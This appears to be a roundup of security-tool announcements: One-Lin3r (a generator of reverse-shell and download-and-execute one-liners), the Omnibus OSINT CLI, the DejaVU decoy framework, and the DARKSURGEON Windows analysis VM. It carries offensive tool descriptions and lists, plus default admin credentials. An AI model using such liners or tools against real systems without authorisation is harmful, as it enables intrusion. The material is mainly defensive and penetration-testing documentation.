One-Lin3r v1.1 – Gives You One-Liners That Aids In Penetration Testing Operations

One-Lin3r is a simple and light-weight framework inspired by the web-delivery module in Metasploit. It consists of various one-liners that aid in penetration testing operations:

- Reverser: Give it an IP & port and it returns a reverse shell liner ready for copy & paste.
- Dropper: Give it an uploaded-backdoor URL and it returns a download-&-execute liner ready for copy & paste.
- Other: Holds liners with a general purpose to help in penetration testing (ex: Mimikatz, PowerUp, etc.) on the trending OSes (Windows, Linux, and macOS). More OSes can be added too.

Features

- Search for any one-liner in the database by its full name or partially.
- You can add your own liners by following these steps to create a ".liner" file. You can also send it to me directly and it will be added to the framework and credited with your name.
- Autocomplete any framework command, with recommendations in case of typos (in case you love hacking like in the movies).
- Command line arguments can be used to give the framework a resource file to load and execute for automation.
- The ability to reload the database if you added any liner, without restarting the framework.
- You can add any platform to the payloads database just by making a folder in the payloads folder and creating a ".liner" file there.
- More...

The payloads database is not big now because this is the first edition, but it will get bigger with updates and contributions.

Usage

Command line arguments

    usage: one-lin3r [-h] [-r R] [-x X] [-q]

    optional arguments:
      -h, --help  show this help message and exit
      -r          Execute a resource file (history file).
      -x          Execute a specific command (use ; for multiples).
      -q          Quit mode (no banner).

Framework commands

    Command            Description
    --------           -----------
    help/?             Show this help menu
    list/show          List payloads you can use in the framework
    search             Search payloads for a specific one
    use <payload>      Use an available payload
    info <payload>     Get information about an available payload
    banner             Display banner
    reload/refresh     Reload the payloads database
    check              Prints the core version and database version, then checks for them online.
    history            Display the most important command line history from the beginning
    save_history       Save command line history to a file
    exit/quit          Exit the framework

Installing and requirements

To make the tool work at its best you must have:
- Python 3.x or 2.x (3 preferred).
- Linux (tested on Kali rolling), a Windows system, or macOS (tested on 10.11).
- The requirements mentioned in the next few lines.

Installing

For Windows (after downloading the ZIP and unzipping it):

    python -m pip install ./One-Lin3r-master
    one-lin3r -h

For Linux, git clone the repository and install libncurses5-dev with your distribution's package manager, then:

    pip install ./One-Lin3r
    one-lin3r -h

Updating the framework or the database

On Linux, while outside the directory:

    cd One-Lin3r && git pull && cd ..
    pip install ./One-Lin3r --upgrade

On Windows, if you don't have git installed, re-download the framework zip!

Download One-Lin3r


Omnibus – Open Source Intelligence Collection, Research, And Artifact Management

An omnibus is defined as a volume containing several novels or other items previously published separately, and that is exactly what the InQuest Omnibus project intends to be for Open Source Intelligence collection, research, and artifact management.

By providing an easy to use interactive command line application, users are able to create sessions to investigate various artifacts such as IP addresses, domain names, email addresses, usernames, file hashes, Bitcoin addresses, and more as we continue to expand.

This project has taken motivation from the greats that came before it such as SpiderFoot, Harpoon, and DataSploit. Much thanks to those great authors for contributing to the world of open source.

The application is written with Python 2.7 in mind and has been successfully tested on OSX and Ubuntu 16.04 environments.

As this is a pre-release of the final application, there will very likely be some bugs and uncaught exceptions or other weirdness during usage. Though for the most part, it is fully functional and can be used to begin OSINT investigations right away.

Vocabulary

Before we begin we'll need to cover some terminology used by Omnibus.

- Artifact: An item to investigate. Artifacts can be created in two ways: using the new command, or by being discovered through module execution.
- Session: Cache of artifacts created after starting the Omnibus CLI. Each artifact in a session is given an ID to quickly identify and retrieve the artifact from the cache. Commands can be executed against an artifact either by providing its name or its corresponding session ID.
- Module: Python script that performs some arbitrary OSINT task against an artifact.

Running Omnibus

Starting up Omnibus for investigation is as simple as cloning this GitHub repository, installing the Python requirements using pip install -r requirements.txt, and running the CLI with python2.7.

[Screenshot: Omnibus Shell – Main Startup]

For a visual reference of the CLI, pictured above is the Omnibus console after a new session has been started, 2 artifacts have been added to a session, and the help menu is shown.

API Keys

You must set any API keys you'd like to use within modules inside the omnibus/etc/apikeys.json file. This file is a JSON document with placeholders for all the services which require API keys, and is only accessed by Omnibus on a per-module basis to retrieve the exact API key a module needs to execute.

It should be noted that most of the services requiring API keys have free accounts and API keys. Some free accounts may have lower resource limits, but that hasn't been a problem during smaller daily investigations or testing the application.

A handy tip: use the cat apikeys command to view which keys you do in fact have stored. If modules are failing, check here first to ensure your API key is properly saved.

Interactive Console

When you first run the CLI, you'll be greeted by a help menu with some basic information. We tried to build the command line script to mimic some common Linux console commands for ease of use. Omnibus provides commands such as cat to show information about an artifact, rm to remove an artifact from the database, ls to view current session artifacts, and so on.

One additional feature of note is the use of the > character for output redirection. For example, if you wish to retrieve the details of an artifact and save them to a JSON file on your local disk, you'd simply run the command:

    cat <artifact name> > inquest-report.json

and there it would be! This feature also works with full file paths instead of relative paths.

The high level commands you really need to know to use Omnibus are:

    session                             start a new session
    new <artifact name>                 create a new artifact for investigation
    modules                             display list of available modules
    open <file path>                    load a text file list of artifacts into Omnibus as artifacts
    cat <artifact name | session id>    view beautified JSON database records
    ls                                  show all active artifacts
    rm                                  remove an artifact from the database
    wipe                                clear the current artifact session

Also, if you ever need a quick reference on the different commands available for different areas of the application, there are sub-help menus for this exact purpose. Using these commands will show you only those commands relevant to a specific area:

    general      overall commands such as help, history, quit, set, clear, banner, etc.
    artifacts    display commands specific to artifacts and their management
    sessions     display helpful commands around managing sessions
    modules      show a list of all available modules

Artifacts

Overview

Most cyber investigations begin with one or more technical indicators, such as an IP address, file hash or email address. After searching and analyzing, relationships begin to form and you can pivot through connected data points. These data points are called Artifacts within Omnibus and represent any item you wish to investigate.

Artifacts can be one of the following types:
- IPv4 address
- FQDN
- Email Address
- Bitcoin Address
- File Hash (MD5, SHA1, SHA256, SHA512)
- User Name

Creating & Managing Artifacts

The command "new" followed by an artifact will create that artifact within your Omnibus session and store a record of the artifact within MongoDB. This record holds the artifact name, type, subtype, module results, source, notes, tags, children information (as needed) and time of creation. Every time you run a module against a created or stored artifact, the database document will be updated to reflect the newly discovered information.

To create a new artifact and add it to MongoDB for tracking, run the command new <artifact name>. For example, to start investigating a domain, you would run new followed by the domain name. Omnibus will automatically determine what type the artifact is and ensure that only modules for that type are executed against the artifact.

When a module is executed, new artifacts may be found during the discovery process. For example, running the "dnsresolve" command might find new IPv4 addresses not previously seen by Omnibus. If this is the case, those newly found artifacts are automatically created as new artifacts in Omnibus and linked to their parent with an additional field called "source" to identify from which module they were originally found.

Artifacts can be removed from the database using the "delete" command. If you no longer need an artifact, simply run the delete command and specify the artifact's name or the session ID if it has one.

Sessions

Omnibus makes use of a feature called "sessions". Sessions are temporary caches created via Redis each time you start a CLI session. Every time you create an artifact, that artifact's name is added to the Session along with a numeric key that makes for easy retrieval, searching, and action against the related artifact. For example, if your session held one item, instead of needing to execute virustotal <artifact name> you could also run virustotal 1 and you would receive the same results. In fact, this works against any module or command that uses an artifact name as its first argument.

Sessions are here for easy access to artifacts and will be cleared each time you quit the command line session. If you wish to clear the session early, run the command "wipe" and you'll get a clean slate.

Eventually, we would like to add a Cases portion to Omnibus that allows users to create cases of artifacts, move between them, and maintain a more coherent OSINT management platform. Though for this current pre-release, we will be sticking with the Session. 🙂

[Screenshot: Interacting with Session IDs instead of Artifact names]

Modules

Omnibus currently supports the following list of modules. If you have suggestions for modules or would like to write one of your own, please create a pull request. Also, within the Omnibus console, typing the module name will show you the Help information associated with that module.

- Blockchain.info
- Censys
- ClearBit
- Cymon
- DNS subdomain enumeration
- DNS resolution
- DShield (SANS ISC)
- GeoIP lookup
- Full Contact
- Gist Scraping
- GitHub user email search
- Hurricane Electric host search
- HIBP search
- Hunter.io
- IPInfo
- IPVoid
- KeyBase
- Nmap
- PassiveTotal
- Pastebin
- PGP Email and Name lookup
- RSS Feed Reader
- Shodan
- Security News Reader
- ThreatCrowd
- ThreatExpert
- TotalHash
- Twitter
- URLVoid
- VirusTotal
- Web Recon
- WHOIS

As these modules are a work in progress, some may not yet work as expected, but this will change over the coming weeks as we hope to officially release version 1.0 to the world!

Machines

Machines are a simple way to run all available modules for an artifact type against a given artifact. This is a fast way to gather as much information on a target as possible using a single command.

To perform this, simply run the command machine <artifact name|session ID> and wait a few minutes until the modules are finished executing.

The only caveat is that this may return a large volume of data and child artifacts depending on the artifact type and the results per module.
To remedy this, we are investigating a way to remove specific artifact fields from the stored database document to make it easier for users to prune unwanted data.

Quick Reference Guide

Some quick commands to remember are:

    session                         start a new artifact cache
    cat <artifact name>|apikeys     pretty-print an artifact's document or view your stored API keys
    open <file path>                load a text file list of artifacts into Omnibus for investigation
    new <artifact name>             create a new artifact and add it to MongoDB and your session
    find <artifact name>            check if an artifact exists in the db and show the results

Reporting

Reports are the JSON output of an artifact's database document, essentially a text file version of the output of the "cat" command. But by using the report command you may specify an artifact and a file path you wish to save the output to:

    omnibus >> report <artifact name> /home/adam/intel/osint/reports/inq_report.json

The above command overrides the standard report directory of omnibus/reports. By default, if you do not specify a report path, all reports will be saved to that location. Also, if you do not specify a file name, the report will use the following format:

    [artifact_name]_[timestamp].json

Redirection

The output of commands can also be saved to arbitrary text files using the standard Linux character >. For example, if you wish to store the output of a VirusTotal lookup for a host to a file called "vt-lookup.json" you would simply execute:

    virustotal <artifact name> > vt-lookup.json

By default the redirected output files are saved in the current working directory, therefore "omnibus/", but if you specify a full path such as virustotal <artifact name> > /home/adam/intel/cases/001/vt-lookup.json the JSON formatted output will be saved there.

Monitoring Modules

Omnibus will soon be offering the ability to monitor specific keywords and regex patterns across different sources. Once a match is found, an email or text message alert could be sent to the user to inform them of the discovery. This could be leveraged for real-time threat tracking, identifying when threat actors appear on new forums or make a fresh Pastebin post, or simply to stay on top of the current news.

Coming monitors include:
- RSS monitor
- Pastebin monitor
- Generic Pastesite monitoring
- Generic HTTP/JSON monitoring

Download Omnibus
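The Artifacts and Sessions sections above describe two pieces of behaviour that are easy to get subtly wrong: deciding what type a new artifact is (so only the right modules run against it) and letting a numeric session ID stand in for an artifact name. The following is an added example, not Omnibus's own code (Omnibus targets Python 2.7; this is Python 3). The (type, subtype) labels, the Session class and the regexes are this example's own choices; the Bitcoin check goes beyond a shape test and verifies the Base58Check checksum, so a mistyped address falls through to the user-name catch-all instead of being investigated as a wallet.

```python
# Added example (not Omnibus's own code; Omnibus targets Python 2.7, this is
# Python 3): classify an artifact string into the artifact types listed above
# and resolve a "name or session ID" argument the way the session cache does.
# The (type, subtype) labels and the Session class are this example's own.
import hashlib
import ipaddress
import re

_EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@([A-Za-z0-9-]+\.)+[A-Za-z]{2,}$")
_FQDN_RE = re.compile(
    r"^(?=.{1,253}$)([A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}$")
_HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
_BTC_RE = re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$")  # legacy Base58 form
_B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
_HASH_BY_LEN = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}


def _base58check_ok(addr):
    """Decode Base58 and verify the trailing 4-byte double-SHA256 checksum."""
    n = 0
    for ch in addr:
        n = n * 58 + _B58.index(ch)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    body = b"\x00" * (len(addr) - len(addr.lstrip("1"))) + body  # leading '1' == 0x00
    if len(body) != 25:  # 1 version byte + 20 byte hash160 + 4 byte checksum
        return False
    payload, checksum = body[:-4], body[-4:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def classify(value):
    """Return (type, subtype); order matters, the most specific syntax wins."""
    v = value.strip()
    try:
        ipaddress.IPv4Address(v)
        return ("host", "ipv4")
    except ipaddress.AddressValueError:
        pass
    if _EMAIL_RE.match(v):
        return ("email", None)
    if _HEX_RE.match(v) and len(v) in _HASH_BY_LEN:
        return ("hash", _HASH_BY_LEN[len(v)])
    if _BTC_RE.match(v) and _base58check_ok(v):  # looks like BTC *and* checksums
        return ("btc", None)
    if _FQDN_RE.match(v):
        return ("host", "fqdn")
    return ("user", None)  # catch-all: treat it as a user name


class Session:
    """In-memory stand-in for the Redis session cache: numeric IDs <-> names."""

    def __init__(self):
        self._by_id = {}
        self._by_name = {}

    def add(self, name):
        """Register an artifact name; re-adding returns the existing ID."""
        if name not in self._by_name:
            sid = len(self._by_id) + 1
            self._by_id[sid] = name
            self._by_name[name] = sid
        return self._by_name[name]

    def resolve(self, arg):
        """Accept an artifact name or its session ID (so 'virustotal 1' works)."""
        if arg.isdigit():
            return self._by_id.get(int(arg))
        return arg if arg in self._by_name else None

    def wipe(self):
        """Equivalent of the 'wipe' command: clear the cache."""
        self._by_id.clear()
        self._by_name.clear()
```

The check order is the point: a 64-character hex string must be tested as a hash before the FQDN and user-name rules see it, and an address that matches the Bitcoin shape but fails its checksum is not a wallet, so it should not trigger the blockchain modules.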


DejaVU – Open Source Deception Framework

Deception techniques, if deployed well, can be very effective for organizations to improve network defense and can be a useful arsenal for blue teams to detect attacks at a very early stage of the cyber kill chain. But the challenge we have seen is that deploying, managing and administering decoys across large networks is still not easy and becomes complex for defenders to manage over time. Although there are a lot of commercial tools in this space, we haven't come across open source tools which can achieve this.

With this in mind, we have developed DejaVu, an open source deception framework which can be used to deploy decoys across the infrastructure. This could be used by the defender to deploy multiple interactive decoys (HTTP servers, SQL, SMB, FTP, SSH, client side – NBNS) strategically across their network on different VLANs. To ease the management of decoys, we have built a web based platform which can be used to deploy, administer and configure all the decoys effectively from a centralized console. A logging and alerting dashboard displays detailed information about the alerts generated and can be further configured on how these alerts should be handled. If certain IPs, like an in-house vulnerability scanner, SCCM etc., need to be whitelisted, this can be configured, which effectively means very few false positives.

Alerts only occur when an adversary is engaged with the decoy, so when the attacker touches the decoy during reconnaissance or performs authentication attempts this raises a high accuracy alert which should be investigated by the defense. Decoys can also be placed on the client VLANs to detect client side attacks such as responder/LLMNR attacks using client side decoys. Additionally, common attacks which the adversary uses to compromise, such as abusing Tomcat/SQL server for an initial foothold, can be deployed as decoys, luring the attacker and enabling detection.

A video demo for the tool is published here: YouTube URL

Architecture

- Host OS: Primary OS hosting the DejaVU virtual box. Note: the primary host can be OS independent (Windows/Linux) and can be based on corporate hardening guidelines.
- DejaVu Virtual Box: Debian based image containing the open source deception framework to deploy multiple interactive decoys (HTTP servers, SQL, SMB, FTP, SSH, client side – NBNS).
- Networking
  - Management Interface: An interface to access the web based management console. (Recommended to be isolated from the internal network.)
  - Decoy Interface: Trunk/Access interface for inbound connections from different networks towards the interactive decoys. (Recommended to block outbound connections from this interface.)
  - Virtual Interfaces: Interfaces bridged with the decoy interface to channel traffic towards the decoys.
- Server Dockers: Docker based service containers – HTTP (Tomcat/Apache), SQL, SMB, FTP, SSH
- Client Dockers: Docker based client container – NBNS client
- Management Console (Web + DB): A centralized console to deploy, administer and configure all the decoys effectively, along with a logging and alerting dashboard to display detailed information about the alerts generated.

Usage Guide

Initial Setup

Configure a username/password for the admin panel:

    php config.php --username=<username> --password=<provide password> --email=<provide email>

Default URL to access the admin panel: (not preserved in this copy). The VM network adapter type should be "PCNet" (full name is something like PCnet-FAST III).

Set the SMTP configuration in "mailalert.php" to receive email alerts.

Now when you go to the default URL, you are greeted by the logon prompt.

Add Server Decoy

To add a decoy, we first need to add a VLAN on which we want to later deploy decoys. Select Decoy Management -> Add VLAN and enter the VLAN ID. Use the "List Available VLANs" option to list the VLANs tagged on the interface.

To add a server decoy, select Decoy Management -> Add Server Decoy. Provide the details for the new decoy as shown below. Select the services (SMB/FTP/MySQL/FTP/Web Server/SSH) to be deployed, and either use a dynamic address or provide a static IP address.

Let's do some port scans and auth attempts from the attacker machine on the server VLAN and analyze the alerts. View the alerts triggered when the attacker scanned our decoy and tried to authenticate: select Log Management -> List Events.

Add Client Decoy

To add a client decoy, select Decoy Management -> Add Client Decoy. Provide the details for the new decoy as shown below. It's recommended to place the client decoy on user VLANs to detect responder/LLMNR attacks.

Let's run responder from the attacker machine on the end user VLAN and analyze the alerts. View the alerts triggered when the attacker scanned our decoy and tried to authenticate: Log Management -> List Events.

Filter Alerts

Alerts can be configured based on various parameters. Example: "Don't send alerts from IP", for when certain IPs like an in-house vulnerability scanner, SCCM etc. need to be whitelisted.

To Do

- Code cleanup and sanitization
- Persistence on reboot
- Add client side decoys generating HTTP, FTP traffic
- ISO image
- Wiki

Authors

- Bhadresh Patel (@bhdresh)
- Harish Ramadoss (@hramados)

Download DejaVU
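The alerting model described above (a decoy should be silent until something touches it, and known scanners must not generate noise) is small enough to show end to end. The following is an added example written for this page, not DejaVU code (DejaVU's console is PHP; this is Python so the logic reads on its own). The event line format, the field names, the whitelist subnets and the sample events are all constructed for the example; they are not DejaVU's log schema.

```python
# Added example (not DejaVU code): turn raw decoy interaction events into
# alerts, dropping sources on a whitelist (an in-house vulnerability scanner,
# SCCM) as the Filter Alerts section describes. Event format, field names and
# sample values are constructed for this example, not DejaVU's own schema.
import ipaddress
from collections import defaultdict

# Constructed sample events: "timestamp src_ip decoy_ip port service action"
SAMPLE_EVENTS = """\
2018-06-01T10:00:01 10.10.5.23 10.10.5.200 445 smb connect
2018-06-01T10:00:01 10.10.5.23 10.10.5.200 21 ftp connect
2018-06-01T10:00:02 10.10.5.23 10.10.5.200 22 ssh connect
2018-06-01T10:00:02 10.10.5.23 10.10.5.200 3306 mysql connect
2018-06-01T10:00:09 10.10.5.23 10.10.5.200 22 ssh auth_attempt
2018-06-01T10:00:10 10.10.5.23 10.10.5.200 22 ssh auth_attempt
2018-06-01T10:05:00 10.10.1.9 10.10.5.200 445 smb connect
2018-06-01T10:05:00 10.10.1.9 10.10.5.200 22 ssh connect
2018-06-01T10:05:00 10.10.1.9 10.10.5.200 80 http connect
2018-06-01T11:00:00 10.10.7.77 10.10.5.200 80 http connect
"""

# Constructed whitelist: the scanner subnet and a single SCCM server.
WHITELIST = [ipaddress.ip_network("10.10.1.0/24"), ipaddress.ip_network("10.10.0.5/32")]

SCAN_PORT_THRESHOLD = 3  # distinct decoy ports touched by one source => "scan"


def parse_events(text):
    """Parse the constructed line format into dicts; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, service, action = line.split()
        events.append({"ts": ts, "src": ipaddress.ip_address(src), "dst": dst,
                       "port": int(port), "service": service, "action": action})
    return events


def is_whitelisted(addr):
    """True when the source falls inside any whitelisted network."""
    return any(ipaddress.ip_address(str(addr)) in net for net in WHITELIST)


def build_alerts(events):
    """Aggregate per source; whitelisted sources never produce an alert."""
    by_src = defaultdict(list)
    for ev in events:
        if is_whitelisted(ev["src"]):
            continue
        by_src[ev["src"]].append(ev)
    alerts = []
    for src, evs in by_src.items():
        ports = sorted({e["port"] for e in evs})
        auth = [e for e in evs if e["action"] == "auth_attempt"]
        if len(ports) >= SCAN_PORT_THRESHOLD:
            alerts.append({"src": str(src), "kind": "scan", "ports": ports, "severity": "high"})
        if auth:
            alerts.append({"src": str(src), "kind": "auth_attempt",
                           "services": sorted({e["service"] for e in auth}),
                           "count": len(auth), "severity": "high"})
        if len(ports) < SCAN_PORT_THRESHOLD and not auth:
            # a single touch is still worth a look: nothing legitimate talks to a decoy
            alerts.append({"src": str(src), "kind": "touch", "ports": ports, "severity": "medium"})
    return alerts


if __name__ == "__main__":
    for alert in build_alerts(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

Run on the sample, 10.10.5.23 produces both a scan alert (four decoy ports) and an auth_attempt alert, 10.10.7.77 produces a medium "touch" alert for its single connection, and 10.10.1.9 produces nothing because it sits in the whitelisted scanner subnet. Whitelisting by subnet rather than by single address is deliberate: scanners are usually pooled, and a whitelist that is too narrow is what turns a decoy into a source of false positives.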


DARKSURGEON – A Windows Packer Project To Empower Incident Response, Digital Forensics, Malware Analysis, And Network Defense

DARKSURGEON is a Windows packer project to empower incident response, digital forensics, malware analysis, and network defense.

DARKSURGEON has three stated goals:
- Accelerate incident response, digital forensics, malware analysis, and network defense with a preconfigured Windows 10 environment complete with tools, scripts, and utilities.
- Provide a framework for defenders to customize and deploy their own programmatically-built Windows images using Packer and Vagrant.
- Reduce the amount of latent telemetry collection, minimize error reporting, and provide reasonable privacy and hardening standards for Windows 10.

If you haven't worked with packer before, this project has a simple premise: provide all the tools you need to have a productive, secure, and private Windows virtual machine so you can spend less time tweaking your environment and more time fighting bad guys.

Please note this is an alpha project and it will be subject to continual development, updates, and package breakage.

Development Principles

DARKSURGEON is based on a few key development principles:
- Modularity is key. Each component of the installation and configuration process should be modular. This allows individuals to tailor their packer image in the most flexible way.
- Builds must be atomic. A packer build should either complete all configuration and installation tasks without errors, or it should fail. A packer image with missing tools is a failure scenario.
- Hardened out of the box. To the extent that it will not interfere with investigative workflows, all settings related to proactive hardening and security controls should be enabled. Further information on DARKSURGEON security can be found later in this post.
- Instrumented out of the box. To the extent that it will not interfere with investigative workflows, Microsoft Sysmon, Windows Event Logging, and osquery will provide detailed telemetry on host behavior without further configuration.
- Private out of the box. To the extent that it will not interfere with investigative workflows, all settings related to privacy, Windows telemetry, and error reporting should minimize collection.

Hardening

DARKSURGEON is hardened out of the box, and comes with scripts to enable High or Low security modes.

All default installations of DARKSURGEON have the following security features enabled:
- Windows Secure Boot is enabled.
- Windows Event Log auditing is enabled. (Palantir Windows Event Forwarding guidance)
- Windows PowerShell auditing is enabled. (Palantir Windows Event Forwarding guidance)
- Windows 10 privacy and telemetry are reduced to minimal settings. (Microsoft guidance)
- Sysinternals Sysmon is installed and configured. (SwiftOnSecurity public ruleset)
- LLMNR is disabled.
- NBT is disabled.
- WPAD is removed.
- PowerShell v2 is removed.
- SMB v1 is removed.
- Application handlers for commonly-abused file extensions are changed to notepad.exe.

Additionally, the user may specify a Low or High security mode by using the appropriate scripts. The default setting is to build an image in Low Security mode.

Low Security mode is primarily used for virtual machines intended for reverse engineering, malware analysis, or systems that cannot support VBS security controls. In Low Security mode, the following hardening features are configured:
- Windows Defender Anti-Virus real-time scanning is disabled.
- Windows Defender SmartScreen is disabled.
- Windows Defender Credential Guard is disabled.
- Windows Defender Exploit Guard is disabled.
- Windows Defender Exploit Guard Attack Surface Reduction (ASR) is disabled.
- Windows Defender Application Guard is disabled.
- Windows Defender Application Guard does not enforce isolation.

Note: High Security mode is still in development.

High Security mode is primarily used for production deployment of sensitive systems (e.g. Privileged Access Workstations) and may require additional tailoring or configuration. In High Security mode, the following hardening features are configured:
- Windows Defender Anti-Virus real-time scanning is enabled.
- Windows Defender SmartScreen is enabled and applied to all traffic.
- Windows Defender Credential Guard is enabled.
- Windows Defender Exploit Guard is enabled.
- Windows Defender Exploit Guard Attack Surface Reduction (ASR) is enabled.
- Windows Defender Application Guard is enabled.
- Windows Defender Application Guard enforces isolation.

Telemetry

Whether analyzing unknown binaries or working on sensitive projects, endpoint telemetry powers detection and response operations. DARKSURGEON comes pre-configured with the following telemetry sources available for analysis:
- Windows Event Log auditing is enabled. (Palantir Windows Event Forwarding guidance)
- Windows PowerShell auditing is enabled. (Palantir Windows Event Forwarding guidance)
- Sysinternals Sysmon is installed and configured. (SwiftOnSecurity ruleset)

Privacy

Your operational environment contains some of the most sensitive data from your network, and it's important to safeguard that from prying eyes. DARKSURGEON implements the following strategies to maximize privacy without hindering workflows:
- Windows 10 telemetry settings are configured to minimize collection.
- Cortana, diagnostics, tracking, and other services are disabled.
- Windows Error Reporting (WER) is disabled.
- Windows Timeline, shared clipboard, device hand-off, and other synchronize-by-default applications are disabled or neutered.
- Microsoft guidance for reducing telemetry and data collection has been implemented.

Packages

Out of the box, DARKSURGEON comes equipped with tools, scripts, and binaries to make your life as a defender easier.

- Android Analysis (tools, scripts, and binaries focused on Android analysis and reverse engineering): APKTool (FLARE)
- Blue Team (tools, scripts, and binaries focused on blue team, network defense, and alerting/detection development): ACE, Bloodhound / Sharphound, CimSweep, Dumpsterfire, EndGame Red Team Automation (RTA), Kansa, Posh-Git, Invoke-ATTACKAPI, LOLBAS (Living Off the Land Binaries And Scripts), OSX Collector, Posh-SecMod, Posh-Sysmon, PowerForensics, PowerSploit, Practical Malware Analysis Labs (FLARE), Revoke-Obfuscation, Yara (FLARE)
- Debuggers (tools, scripts, and binaries for debugging binary artifacts): Ollydbg (FLARE), OllyDump (FLARE), OllyDumpEx (FLARE), Ollydbg2 (FLARE), OllyDump2Ex (FLARE), x64dbg (FLARE), Windbg (FLARE)
- Disassemblers (tools, scripts, and binaries for disassembling binary artifacts): IDA Free Trial (FLARE), Binary Ninja Demo (FLARE), Radare2 (FLARE)
- Document Analysis (tools, scripts, and binaries for performing analysis of documents): OffVis (FLARE), OfficeMalScanner (FLARE), PDFId (FLARE), PDFParser (FLARE), PDFStreamDumper (FLARE)
- DotNet Analysis (tools, scripts, and binaries for performing analysis of DotNet artifacts): DE4Dot (FLARE), DNSpy (FLARE), DotPeek (FLARE), ILSpy (FLARE)
- Flash Analysis (tools, scripts, and binaries for performing analysis of Flash artifacts): FFDec (FLARE)
- Forensic Analysis (tools, scripts, and binaries for performing forensic analysis on application and operating system artifacts): Amcache Parser, AppCompatCache Parser, IISGeolocate, JLECmd, LECmd, JumpList Explorer, PECmd, Registry Explorer, Regshot (FLARE), Shellbags Explorer, Timeline Explorer, TSK (The Sleuthkit), Volatility, X-Ways Forensics Installer Manager (XWFIM)
- Hex Editors: FileInsight (FLARE), HxD (FLARE), 010 Editor (FLARE)
- Java Analysis: JD-GUI (FLARE), Dex2JAR
- Network Analysis: Burp Free, FakeNet-NG (FLARE), Wireshark (FLARE)
- PE Analysis: DIE (FLARE), EXEInfoPE (FLARE), Malware Analysis Pack (MAP) (FLARE), PEiD (FLARE), ExplorerSuite (CFF Explorer) (FLARE), PEStudio (FLARE), PEview (FLARE), Resource Hacker (FLARE), VirusTotal Uploader
- PowerShell Modules: Active Directory, Azure Management, Pester
- Python Libraries: Cryptography, Hexdump, OLETools, LXML, Pandas, Passivetotal, PEFile, PyCryptodome, Scapy, Shodan, Sigma, Visual C++ for Python, Vivisect, WinAppDBG, Yara-Python
- Red Team: Grouper, Inveigh, Nmap, PowerShell Empire, PowerupSQL, PSAttack, PSAttack Build Tool, Responder
- Remote Management: AWS Command Line (AWSCLI), OpenSSH, Putty, Remote Server Administration Tools (RSAT)
- Utilities: 1Password, 7Zip, Adobe Flash Player, Adobe Reader, API Monitor, Bleachbit, Boxstarter, Bstrings, Checksum, Chocolatey, Cmder, Containers (Hyper-V), Curl, Cyber Chef, Docker, DotNet 3.5, DotNet 4, Exiftool, FLOSS (FLARE), Git, GoLang, Google Chrome, GPG4Win, Hashcalc, Hashdeep, Hasher, Hashtab, Hyper-V, Irfanview, Java JDK8, Java JRE8, JQ, Jupyter, Keepass, Microsoft Edge, Mozilla Firefox, Mozilla Thunderbird, Neo4j Community, NodeJS, Nuget, Office365 ProPlus, OpenVPN, Osquery, Python 2.7, Qbittorrent, RawCap, Slack, Sublime Text 3, Sysinternals Suite, Tor Browser, UnixUtils, UPX, Visual C++ 2005, Visual C++ 2008, Visual C++ 2010, Visual C++ 2012, Visual C++ 2013, Visual C++ 2015, Visual C++ 2017, Visual Studio Code, Windows 10 SDK, Windows Subsystem for Linux (WSL), Winlogbeat, XorSearch, XorStrings
- Visual Basic Analysis: VBDecompiler

Building DARKSURGEON

Build Process

DARKSURGEON is built using the HashiCorp application packer. The total build time for a new instance of DARKSURGEON is around 2–3 hours.

1. Packer creates a new virtual machine using the DARKSURGEON JSON file and your hypervisor of choice (e.g. Hyper-V, VirtualBox, VMware).
2. The answers.iso file is mounted inside the DARKSURGEON VM along with the Windows ISO. The answers.iso file contains the unattend.xml needed for a touchless installation of Windows, as well as a PowerShell script to configure Windows Remote Management (WinRM).
3. Packer connects to the DARKSURGEON VM using WinRM and copies over all files in the helper-scripts and configuration-files directories to the host.
4. Packer performs serial installations of each of the configured PowerShell scripts, performing occasional reboots as needed.
5. When complete, packer performs a sysprep, shuts down the virtual machine, and creates a vagrant box file. Additional outputs may be specified in the post-processors section of the JSON file.

Setup

Note: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMware support are forthcoming.

1. Install packer, vagrant, and your preferred hypervisor on your host.
2. Download the repository contents to your host.
3. Download a Windows 10 Enterprise Evaluation ISO (1803).
4. Move the ISO file to your local DARKSURGEON repository.
5. Update DARKSURGEON.json with the ISO SHA1 hash and file name.
6. (Optional) Execute the PowerShell script New-DARKSURGEONISO.ps1 to generate a new answers.iso file. There is an answers ISO file included in the repository, but you may re-build it if you don't trust it or would like to modify the unattend files:

    powershell.exe New-DARKSURGEONISO.ps1

7. Build the recipe using packer:

    packer build -only=[hyperv-iso|vmware|virtualbox] .\DARKSURGEON.json

Configuring DARKSURGEON

DARKSURGEON is designed to be modular and easy to configure. An example configuration is provided in the DARKSURGEON.json file, but you may add, remove, or tweak any of the underlying scripts.

Have a custom CA you need to add? Need to add a license file for IDA? No problem. You can throw any files you need in the configuration-files directory and they'll be copied over to the host for you.

Want to install a custom package, or need some specific OS tweaks? No worries.
Simply make a new powershell script (or modify an existing one) in the configuration-scripts directory and add it as a build step in the packer JSON file.Using DARKSURGEONNote: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMWare support are forthcoming.Once DARKSURGEON has successfully built, you’ll receive an output vagrant box file. The box file contains the virtual machine image and vagrant metadata, allowing you to quickly spin up a virtual machine as needed.Install vagrant and your preferred hypervisor on your host.Navigate to the DARKSURGEON repository (or the location where you’ve saved the DARKSURGEON box file). Perform a vagrant up: vagrant upVagrant will now extract the virtual machine image from the box file, read the metadata, and create a new VM for you. Want to kill this VM and get a new one?Easy, just perform the following: vagrant destroy && vagrant upOnce the DARKSURGEON virtual machine is running, you can login using one of the two local accounts:Note: These are default accounts with default credentials. You may want to consider changing the credentials in your packer build.Administrator Account:Username: DarksurgeonPassword: darksurgeonLocal User Account:Username: UnprivilegedPassword: unprivilegedIf you’d rather not use vagrant, you can either import the VM image manually, or look at one of the many other post-processor options provided by packer.Downloading 